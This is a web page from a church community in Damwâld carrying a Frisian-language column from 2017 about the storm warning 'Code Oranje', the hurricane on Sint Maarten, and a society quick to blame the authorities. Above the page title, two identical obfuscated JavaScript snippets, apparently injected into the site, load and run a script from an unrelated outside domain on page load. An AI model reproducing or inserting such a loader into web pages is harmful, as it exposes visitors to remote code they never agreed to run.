;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Code Oranje - PKN Damwâld

Code Oranje

Gepubliceerd op: woensdag 27 september 2017

Nee, dit stikje giet net oer ùs keningshûs, mar oer in wynpûster yn’e hjerst. Lèsten wie it safier, in hjerststoarm!, Neffen de waarminsken, mei Piet P. foarop koe it wolris mal gean. Wynkrèft 8 of 9 waard ùs foarsein en dat is Code Oranje! It waait dan nog gjin 100 km yn’e oere, mar it wurd brocht of soe der net in hûs syn dak bihâlde! De fersekeringsminsken sette harren dan al skrap, want it reint dan wer claims fansels, al of net terjochte! It kin dan wèze dat de pier fan Holwert der ûnder strûpt en dat dèr tweintich beamen omgean! Wat in kâlde drokte tink ik dan, mar rekkenje der mar op, dat it Journaal der mei iepent om 8 ûre! Nee, dan Sint Maarten en omstreken, der witte se pas wat hurde wyn yn hâld! In orkaan mei 200 km. yn’e oere komt der gauris foar. Wy ha it allegearre op de televyzje wol sjoen tink ik. Rampzalig! It Journaal frege in biwenner fan Sint Maarten, dy’t alles kwyt wie, syn hûs, syn wurk; … …..en hoe nu verder…? De man die’t yntervieuwt waard antwurde hiel kalm; “God zal ons helpen, net zoals de vorige keer, toen zijn we er ook weer bovenop gekomen”… Hoe soe it ùs fergean tocht ik by mysels; alles kwytreitsje troch in natuurferskynsel! fersekeringspapieren by de hân fansels, mar ja, in orkaan sil dochs wol oermacht wèze. Dan is der by ùs altyd noch ien rèding; de Oerheid!! Jawis , dat is it ommers, de oerheid hie ùs warskôgje moatten, de buorgermaster hie hûs oan hûs oanbelje moaten en sa net: dan mar betelje!! Want der moat dochs ien de skuld ha fan wat ùs oerkomt!! Nee, us maatskippij is net (mear) fan it “fertrouwen”.Wy bin mear fan it “ wantrouwen”(wurden)! Dat witte de boargermasters fansels ek al, en wa wit ha se dèrom Piet P. en consorten ynskeakele; Goed beare mannen!! En sa ûntstie Code Oranje.

Columnist:Sietse

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns